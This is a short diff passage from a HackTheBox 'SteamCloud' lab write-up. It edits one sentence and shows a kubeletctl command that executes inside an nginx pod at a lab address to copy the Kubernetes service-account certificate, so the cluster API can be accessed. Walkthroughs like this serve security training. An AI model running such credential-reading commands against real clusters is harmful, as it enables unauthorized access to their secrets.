F41zK4r1m/HackTheBox/SteamCloud.md

 Now, with the ca.crt and the token, I can authenticate to the cluster which is running on 8443 on which I wasn't able to authenticate earlier.

-For the authenticate I extracted ca.crt & token into my local kali host.
+I leveraged this newfound knowledge to extract the ca.crt and token to my local Kali host:

 ```bash
 kubeletctl exec 'cat /run/secrets/kubernetes.io/serviceaccount/ca.crt' -p nginx -c nginx -s 10.10.11.133 > ca.crt